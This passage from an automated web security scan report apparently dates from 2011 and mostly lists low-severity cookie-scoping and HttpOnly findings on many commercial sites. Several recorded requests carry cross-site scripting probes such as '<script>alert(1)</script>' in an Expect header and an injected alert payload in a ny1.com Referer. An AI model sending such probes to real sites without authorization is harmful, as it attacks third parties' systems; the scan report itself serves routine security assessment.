Set-Cookie: bkc=KJh5NZN1kVDROdegT4U9yUUv/Lr6JGdGCIEe6uPGXCvLaFw6oEu+hLvDSZEmMPJKi3miWWcosiV2gxdxSibh15yvLX9t1N+2S43CZujE3XWizaHrV4dgmK4ilB4N8qe4pFIbfo5plXde5O8HP5uMflXbWwm/SO3rBnfwr1vTlnM1rBHTM4s2h3rBiTNUsM2K3wtBgdlOzkJI/iwkxfkWQTBWcTl+MbUHl47LNUrNmu2Km/5GytvwlGm87MNKu13zaTdiRIOtGFj5ttwo5cAFIf9h8XPHNJpGJMgPZbC7MhgFZvr2lFMewm6kXp6SbKU8J8hFl/4XiJwF/Pn4lhdVgMnZIqrKSIgEczzhNL/fwVoL4EVVx54Yf16FAEnlWhdOdoXz/Uo3qu43YpnjqhF48V+pF4C5ewofWXTRIFcbtBXPSjXt87gh14EnsYDS36I84jWt8XUUz7eKjGQtwoo02h7+ZAq+Mzjk+bUziTXYfWINT28XfRwswJ23o2Im1hT+C5BAwJhFN8UsM2HGP2I3w5dTu3FtyOj+7G2TawrPCdN136p1MN6SNrSXrOw4EVjfNaqUc1ri56gR4hCpUo0eIrBFWDDr5yENf1Nf+YFitFhUc1JX4XjIE9pc152p5fOlFSQ5BIqhhKmRplimHpzl+y4gj4wbUcBKw9aw/w2IDlLydAx0f8gpTMZTc2zMcoN5rVdV4tPozNbXOHd2Bh/NHO+y70brj4zjzNfXUB/+xtNOdqdjHcT565cOk9r1mudIWFrjQ2XldaPXN+Xr6ISXKObKkpdi6/SmX48a9FIbijHqMSFZS4B85m6+NFl/Z1zU5tadolsKoGREXtawsUBKMWz2kK/I7ZhLhFwbFNFRblmNNhkpFEi1XUtXFTTKqy7bLDrvwegdHxFZAhfTQ325XxGozpdh00sipvDKnuC3Qe+X2oa+ocpRZmFals2HBeaKzB2yvB5Q4jmRgpibEJFU88gfiKFh1UWEf3eMzVwmil1h4AI5HdUqD+bB2dAum96lAllKNIq2z1l2h1mTMNdMKHot41/Tmc2m4540HcXK46XVNFxRNFBX0QIa+RwNJ+taXfX9IdPA4cLLZ6RntKDNtZUsUY2IW0dcokVT1yXXWXrAFQ4j/KwJWrNnhQ4r658Fpmm87Lq2FVcGVjpcpAgtkws4h7IUowyh7i2hFnXFUBIJd5FQLzdCKKIShh1wywrxFhMTTzYz5XN8XuaTBdndy1cdjXZXSXbnwTDfAO2ppc7Uy4L8bDdQBrHdz1h8N8yUeXa50ndZZwmrmudIeK5oUq2cn6xqQrzfIfBmDrSXKYrv6FWIrFnnJgit5sF04GMfz4jVCEpvyIdcd57ahoyUobcdem8wKD7+gvXS7dVNIEb887fisShFoLzMldcgvfHwI2gzppUlWNIayt2T2ckh0g7slur6Ed7SlBXN2h5c1wIe3cXbDGFprMwyJPIqbNNpF4CdhSKNF9==; expires=Wed, 28-Sep-2011 18:15:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E1015RUZIRnksHQRLMmDsYyBeRt1ManBEOvBALhuAyN1ERhBWXN1DQhEAG01MD61RvojZB/0ibmJ6Nc5AjXuATaXE3RsP/pD8QjMYp9qQx943A3Sx==; expires=Wed, 28-Sep-2011 18:15:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 02-Apr-2011 18:15:11 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

6.113. http://view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:10:30 GMT; path=/; domain=c3metrics.com
480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-30_14981377291301681430; expires=Wed, 30-Mar-2016 18:10:30 GMT; path=/; domain=c3metrics.com
480-nUID=adver_14981377291301681430; expires=Fri, 01-Apr-2011 18:25:30 GMT; path=/; domain=c3metrics.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:10:30 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:10:30 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-30_14981377291301681430; expires=Wed, 30-Mar-2016 18:10:30 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_14981377291301681430; expires=Fri, 01-Apr-2011 18:25:30 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

6.114. http://www.amway.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amway.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__AmwayTmp=cid=0&cnty=US&lng=EN&bn=Visitor&orgclass=Visitor&put=Applicant1&crncy=USD&vcartid=eebb676b-4b26-4182-8e3a-4c819b186906; domain=.amway.com; path=/
TLTHID=0539D39648D35D7F5A9612A91A404282; Path=/; Domain=.amway.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amway.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 53013
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: x_Amway=USQSB104 - NA.03.01.03-2011.03.28.1823; path=/
Set-Cookie: __AmwayTmp=cid=0&cnty=US&lng=EN&bn=Visitor&orgclass=Visitor&put=Applicant1&crncy=USD&vcartid=eebb676b-4b26-4182-8e3a-4c819b186906; domain=.amway.com; path=/
Set-Cookie: TLTHID=0539D39648D35D7F5A9612A91A404282; Path=/; Domain=.amway.com
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa TAIa OUR IND STA"
Date: Fri, 01 Apr 2011 15:37:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta
...[SNIP]...

6.115. http://www.bbpeoplemeet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bbpeoplemeet.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NSC_QN-CCQ=ffffffff09099c0d45525d5f4f58455e445a4a423660;Version=1;Max-Age=18000;path=/;domain=.bbpeoplemeet.com;httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bbpeoplemeet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
Date: Fri, 01 Apr 2011 15:35:46 GMT
Set-Cookie: NSC_QN-CCQ=ffffffff09099c0d45525d5f4f58455e445a4a423660;Version=1;Max-Age=18000;path=/;domain=.bbpeoplemeet.com;httponly

6.116. http://www.belkin.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.belkin.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

belQuality=42d5_4d960211_WEBSVR01; domain=.belkin.com; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.belkin.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa OUR IND STA", POLICYREF="http://www.belkin.com/w3c/policy.p3p"
X-Powered-By: ASP.NET
Set-Cookie: belQuality=42d5_4d960211_WEBSVR01; domain=.belkin.com; path=/;
Date: Fri, 01 Apr 2011 16:49:20 GMT
Set-Cookie: BIGipServermain_web_pool=1948781066.20480.0000; path=/

6.117. http://www.jpcycles.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpcycles.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=8CB85F91476105580F0F9788F74969B1; Path=/; Domain=.jpcycles.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jpcycles.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=UZOUUKS192.168.223.1CKOIM; path=/
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=8CB85F91476105580F0F9788F74969B1; Path=/; Domain=.jpcycles.com
Set-Cookie: TLTUID=8CB85F91476105580F0F9788F74969B1; Path=/; Domain=.jpcycles.comFri, 01-04-2021 16:32:23 GMT
Date: Fri, 01 Apr 2011 16:32:23 GMT

6.118. http://www.loveandseek.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.loveandseek.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NSC_QN-MBT=ffffffff09099c0e45525d5f4f58455e445a4a423660;Version=1;Max-Age=18000;path=/;domain=.loveandseek.com;httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.loveandseek.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
Date: Fri, 01 Apr 2011 17:27:46 GMT
Set-Cookie: NSC_QN-MBT=ffffffff09099c0e45525d5f4f58455e445a4a423660;Version=1;Max-Age=18000;path=/;domain=.loveandseek.com;httponly

6.119. http://www.mercantila-checkout.com/setcookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mercantila-checkout.com
Path:	/setcookie.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

merc_uid=6451364907577995808; expires=Sat, 19-Apr-2036 17:01:41 GMT; path=/; domain=.mercantila-checkout.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /setcookie.js HTTP/1.1
Host: www.mercantila-checkout.com
Proxy-Connection: keep-alive
Referer: http://www.mercantila.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:01:41 GMT
Server: Apache
Set-Cookie: PHPSESSID=egh03kvj37li18b09a11ogg340; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: merc_uid=6451364907577995808; expires=Sat, 19-Apr-2036 17:01:41 GMT; path=/; domain=.mercantila-checkout.com
Vary: Accept-Encoding
Content-Length: 186
Content-Type: text/html; charset=UTF-8

document.cookie = 'merc_uid=6451364907577995808; expires=Tue, 1 Apr 2036 12:00:00 UTC; path=/';header_ajaxCall('clicklog_response', 'setClickLogFromAjax', '', 'UID=6451364907577995808');

6.120. http://www.progressiveagent.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.progressiveagent.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SLAVESS=ID=f7e8816351fc45ce9c0dac6799e1a88e; path=/; domain=.progressiveagent.com; expires=Sun, 31 Dec 2034 00:00:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.progressiveagent.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 15:36:56 GMT
Server: Microsoft-IIS/6.0
p3p: CP = "CUR ADM DEV PSA PSD CONo OUR IND DSP COR CAO PHY ONL UNI PUR COM FIN NAV INT DEM CNT STA GOV OTC" policyref="http://www.driveinsurance.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "webmaster@progressive.com" on "2004.07.16T10:41-0400" exp "2033.07.16T12:00-0400" r (v 0 s 0 n 0 l 0))
Set-Cookie: SLAVESS=ID=f7e8816351fc45ce9c0dac6799e1a88e; path=/; domain=.progressiveagent.com; expires=Sun, 31 Dec 2034 00:00:00 GMT
Content-Length: 0

6.121. http://www.rambler.ru/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rambler.ru
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lvr=1301672829; domain=.rambler.ru; path=/; expires=Thu, 31-Dec-37 23:55:55 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rambler.ru
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Fri, 01 Apr 2011 15:47:09 GMT
Content-Type: image/x-icon
Content-Length: 1150
Last-Modified: Wed, 16 Dec 2009 12:53:10 GMT
Connection: keep-alive
Keep-Alive: timeout=50
Set-Cookie: lv=1301672829; path=/; expires=Thu, 31-Dec-37 23:55:55 GMT
Set-Cookie: lvr=1301672829; domain=.rambler.ru; path=/; expires=Thu, 31-Dec-37 23:55:55 GMT
Accept-Ranges: bytes

............ .h.......(....... ..... .....@.............................................................................................................................................................
...[SNIP]...

6.122. http://www.wpbf.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wpbf.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

alpha=65ce8f18a56e00001706964d1b06020014130000; expires=Mon, 29-Mar-2021 17:06:31 GMT; path=/; domain=.wpbf.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wpbf.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 16 Nov 2004 19:57:27 GMT
ETag: "c217a3-0-9100f7c0"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/plain
Cache-Control: max-age=3298
Expires: Fri, 01 Apr 2011 18:01:29 GMT
Date: Fri, 01 Apr 2011 17:06:31 GMT
Connection: close
Set-Cookie: alpha=65ce8f18a56e00001706964d1b06020014130000; expires=Mon, 29-Mar-2021 17:06:31 GMT; path=/; domain=.wpbf.com

7. Cookie without HttpOnly flag set previous next
There are 229 instances of this issue:

http://ads.adxpose.com/ads/ads.js
http://community.dogpile.com/
http://dogpile.com/
http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11
http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
http://event.adxpose.com/event.flow
http://support.dogpile.com/pressroom/
http://www.888.com/favicon.ico
http://www.adleaf.com/favicon.ico
http://www.cambridge.org/uk/date/writeYear_js.asp
http://www.dogpile.com/
http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1
http://www.dogpile.com/clickserver/_iceUrlFlag=1
http://www.dogpile.com/dogpile/ws/about/
http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/faq/
http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/
http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index
http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7
http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11
http://www.dogpile.com/dogpile_prefer/ws/redir/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes
http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant
http://www.dogpile.com/dogpile_rss/web/MLB+Schedule
http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/index/
http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Bowl/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Com/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email%20Login/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Log%20In/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Video/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Videos%20Full/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=MLB%20Schedule/adv=/rfcp=RightNav/rfcid=107/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%202010%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Baseball%20Schedules/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%201!2F1!2F09%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Scores/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Standings/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Trade%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=Go%20Daddy%20CEO%20Elephant/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=MLB%20Schedule/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11
http://www.gospel.com/favicon.ico
http://www.hughesnetpower.com/favicon.ico
http://www.mappoint.net/favicon.ico
http://www.mercantila-checkout.com/setcookie.js
http://www.mercantila.com/
http://www.myjobprospects.com/favicon.ico
http://a.collective-media.net/adj/ns.androidtapp/general
http://ad.amgdgt.com/ads/
http://ad.yieldmanager.com/pixel
http://ad.yieldmanager.com/unpixel
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://bh.contextweb.com/bh/set.aspx
http://cf.addthis.com/red/p.json
http://leadback.advertising.com/adcedge/lb
http://mm.chitika.net/minimall
http://pixel.33across.com/ps/
http://pixel.fetchback.com/serve/fb/pdc
http://pixel.quantserve.com/pixel
http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=15423922/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=75921501/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=34648487/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
